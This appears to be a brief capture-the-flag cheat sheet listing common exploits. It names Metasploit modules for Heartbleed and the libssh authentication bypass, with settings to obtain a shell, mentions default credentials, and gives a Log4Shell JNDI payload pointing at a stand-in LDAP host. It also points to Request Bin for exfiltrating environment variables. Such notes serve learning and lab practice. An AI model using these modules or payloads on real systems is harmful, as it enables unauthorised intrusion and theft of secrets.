Common Exploits
Heartbleed
Metasploit module:
auxiliary/scanner/ssl/openssl_heartbleed
Be sure to use
set VERBOSE true
to see the retrieved results. This can often contain a flag or some valuable information.libssh - SSH
libssh0.8.1
(or others??) is vulnerable to an easy and immediate login. Metasploit module:auxiliary/scanner/ssh/libssh_auth_bypass
. Be sure toset spawn_pty true
to actually receive a shell! Thensessions -i 1
to interact with the shell spawned (or whatever appropriate ID)Default credentials
- CheatSheetUnconfigured system can use the default credentials to login.
Log4Shell
Exploit on the Java library Log4j. Malicious code is fetched and executed from a remote JNDI server. A payload looks like
${jndi:ldap://example.com:1389/a}
and need to be parsed by Log4j.Request Bin Useful for detection and environment variable exfiltration.